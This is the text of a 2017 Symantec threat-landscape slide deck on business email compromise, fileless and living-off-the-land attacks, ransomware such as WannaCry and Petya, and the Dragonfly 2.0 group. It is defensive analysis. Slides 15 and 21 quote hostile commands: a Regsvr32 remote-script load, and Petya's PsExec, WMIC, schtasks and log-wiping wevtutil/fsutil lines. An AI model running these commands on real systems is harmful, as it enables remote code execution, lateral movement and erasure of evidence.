  • 1. Presenter Date Threat Landscape Q2 / 2017 Update Asim Rab Candid Wueest Sept 2017
  • 2. 2Copyright © 2017 Symantec Corporation General trends Simple, but successful o Low-tech attacks (BEC) o Living off the land and fileless o Emails with social engineering Focused and selective o More ransomware in corporations o Selective spreading of malware o Attacking supply chain companies
  • 3. 3Copyright © 2017 Symantec Corporation o More than 2 Million new malware variants per day o Script malware leads to many variants Malware statistics Region % of global USA 27.26% Japan 6.49% China 6.04% India 5.82% Brazil 4.12% Germany 3.97% Great Britain 3.59% Canada 2.65% France 2.55% Russia 2.32% Australia 2.17% Italy 2.03% Mexico 1.67% South Korea 1.34% Turkey 1.28% Netherlands 1.27% Spain 1.26% Indonesia 1.11% Poland 1.08% Taiwan 0.90% 0.0 10.0 20.0 30.0 40.0 50.0 60.0 70.0 80.0 90.0 100.0 January February March April May June July August New malware variants per month in millions
  • 4. 4Copyright © 2017 Symantec Corporation Web attacks still elevated 0 200,000 400,000 600,000 800,000 1,000,000 1,200,000 1,400,000 January February March April May June July August o Normally no 0-days exploits used o RIG toolkit is most active o Link spread by email or advertisement o Sometimes infections are restricted to specific IP addresses o Supply chain attacks increased Web attacks blocked per day
  • 5. 5Copyright © 2017 Symantec Corporation Malicious doc containing macro with social engineering Malicious documents still common 5 Embedded binary can be double clicked
  • 6. 6Copyright © 2017 Symantec Corporation o More than half of the malicious attachments are script files o Macros or JavaScript are usually downloading final payload o Most common payloads are ransomware and financial Trojans Email Email e.g. invoice or receipt Attachment e.g. JavaScript Downloader e.g. PowerShell Payload e.g. Ransomware Whitepaper available
  • 7. 7Copyright © 2017 Symantec Corporation Section Business Email Compromise (BEC) 2
  • 8. 8Copyright © 2017 Symantec Corporation 4.3 6.8 4.5 5.1 5.9 4.6 0.0 1.0 2.0 3.0 4.0 5.0 6.0 7.0 8.0 Jan Feb Mar Apr May Jun BEC email received per targeted organization Low-tech attacks: Business email compromise o Spear-phishing taken to the next level o Convince the company to perform a payment transaction o Scams often use typo-squatted domains o Some attacks change the IBAN in invoices o Exposed losses Oct 2013 – Dec 2016 was over $5bn o 8,000 businesses targeted monthly
  • 9. 9Copyright © 2017 Symantec Corporation Create a sense of urgency, requiring immediate action, attempting to pressure the recipient into action BEC subject lines Top three subjects feature in 2/3 of all emails PAYMENT URGENT REQUEST
  • 10. 10Copyright © 2017 Symantec Corporation Section Living off the land 3 Whitepaper available
  • 11. 11Copyright © 2017 Symantec Corporation When attackers turn what you have against you o Fewer new files on disk o more difficult to detect attack, no IoC to share o Use off-the-shelf tools & cloud services o difficult to determine intent & source o These tools are ubiquitous o hiding in plain sight o Finding exploitable zero-day vulnerabilities is getting more difficult o use simple and proven methods such as email & social engineering Living off the land 11
  • 12. 12Copyright © 2017 Symantec Corporation Multiple fileless options exist but not all are truly fileless Fileless attacks e.g. remote code exploits such as EternalBlue and CodeRedMemory only attacks Fileless loadpoint Non-PE files Dual-use tools Documents containing macros, PDFs with JavaScript and scripts (VBS, JavaScript, PowerShell,…) Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver Using benign tools, such as PsExec, to do malicious things
  • 13. 13Copyright © 2017 Symantec Corporation Living off the land attack chain Exploit in memory e.g. SMB EternalBlue Email with Non-PE file e.g. document macro Weak or stolen credentials e.g. RDP password guess Incursion Remote script dropper e.g. LNK with PowerShell from cloud Memory only malware e.g. SQL Slammer Non-persistent Persistent Persistence Fileless persistence loadpoint e.g. JScript in registry Traditional methods Payload Regular non-fileless payload Non-PE file payload e.g. PowerShell script Memory only payload e.g. Mirai DDoS Dual-use tools e.g. netsh or PsExec.exe
  • 14. 14Copyright © 2017 Symantec Corporation o Scripts are very common, especially PowerShell o Many script toolkits available, e.g. PS Empire o Scripts are easy to obfuscate and difficult to detect with signatures o Scripts are flexible and can be adapted quickly Non-PE files Whitepaper available
  • 15. 15Copyright © 2017 Symantec Corporation Fileless loadpoints o Registry run key can point to a remote SCT file o Regsvr32 will download and execute the embedded JScript Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll Downloder.Dromedan (40,000 detections per day) o Embedded JScript uses WMI to execute a PowerShell payload o Script stores encoded DLL in the registry for later use Example: Remote SCT load Malicious.sct file
  • 16. 16Copyright © 2017 Symantec Corporation Section Ransomware 4 Whitepaper available
  • 17. 17Copyright © 2017 Symantec Corporation Ransomware stats o Ransomware is still profitable and common o Multiple self-propagating variants appeared 0 10,000 20,000 30,000 40,000 50,000 60,000 70,000 80,000 90,000 Jan-16 Feb-16 Mar-16 Apr-16 May-16 Jun-16 Jul-16 Aug-16 Sep-16 Oct-16 Nov-16 Dec-16 Jan-17 Feb-17 Mar-17 Apr-17 May-17 Jun-17 Trend Line Other Countries 31% United States 29% Japan 9% Italy 8% India 4% Germany 4% Netherlands 3% UK 3% Australia 3% Russia 3% Canada 3%
  • 18. 18Copyright © 2017 Symantec Corporation o 42% of ransomware infections in 2017 were in enterprises o Due to WannaCry and Petya o Attacks against cloud storage increased Ransomware in enterprises 0 10,000 20,000 30,000 40,000 50,000 60,000 Jan-16 Feb-16 Mar-16 Apr-16 May-16 Jun-16 Jul-16 Aug-16 Sep-16 Oct-16 Nov-16 Dec-16 Jan-17 Feb-17 Mar-17 Apr-17 May-17 Jun-17 Consumer Enterprise
  • 19. 19Copyright © 2017 Symantec Corporation o 1 Billion EternalBlue infection attempts blocked o Profit $140K, Bitcoin accounts emptied August 3rd o Linked to Lazarus group WannaCry 0 20000 40000 60000 80000 100000 120000
  • 20. 21Copyright © 2017 Symantec Corporation o Petya (June variant) classified as a wiper o Semi-targeted infections through supply chain hack (MEDoc) o Profit $10K, Bitcoin account emptied July 4th Petya 0 20 40 60 80 100 120 140 160
  • 21. 22Copyright © 2017 Symantec Corporation o Threat is a DLL executed by rundll32.exe o Uses recompiled version of LSADump Mimikatz to get passwords o Uses PsExec to propagate o [server_name]admin$perfc.dat o psexec rundll32.exe c:windowsperfc.dat #1 [RANDOM] o Uses WMI to propagate if PsExec fails o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create “%System%rundll32.exe “%Windows%perfc.dat" #1 60” o Scheduled task to restart into the malicious MBR payload o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%shutdown14:42.exe /r /f" /ST o Deletes log files to hide traces o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C: Petya uses dual-use tools
  • 22. 23Copyright © 2017 Symantec Corporation Section Targeted attack groups 5
  • 23. 24Copyright © 2017 Symantec Corporation o Active since December 2015 in Europe and North America o Ongoing attacks against energy sector, mainly in Turkey and U.S. Infiltration o Compromised websites and spear phishing (Phishery toolkit) o Trojanized software, using Shelter evasion framework o Various backdoors: Dragonfly 2.0 • Trojan.Listrix • Trojan.Credrix • Backdoor.Goodor • Backdoor.Dorshell • Trojan.Karagany.B • Trojan.Heriplor Slide deck available
  • 24. 25Copyright © 2017 Symantec Corporation o Uses living off the land tactics o PowerShell, PsExec, and BITSAdmin o Phisherly toolkit became available on GitHub in 2016 o Document used SMB template link to leak credentials o Screenutil and Shelter are available online Goal o Information stealing: passwords, documents and screenshots o Potential for sabotage attacks Dragonfly 2.0
  • 25. 26Copyright © 2017 Symantec Corporation o Many cases where legitimate software was compromised o Fast and semi-targeted distribution through update process o Trojanized updates are difficult to discover o Trusted domain, digitally signed, trusted update process,… Examples: o MEdoc (Petya June/2017) o CCleaner (Aug/2017) o Python modules (Sept/2017) o ICS supplier (Dragonfly 2014) Supply chain attacks increasing
  • 26. 27Copyright © 2017 Symantec Corporation o Cybercriminals are focusing on simple but effective methods o Ransomware is still very prevalent o Living off the land tactics are increasingly used o Often targeted infections with limited distribution Summary

Notas do Editor

  1. https://www.symantec.com/security_response/publications/monthlythreatreport.jsp
  2. https://www.symantec.com/security_response/publications/monthlythreatreport.jsp
  3. https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/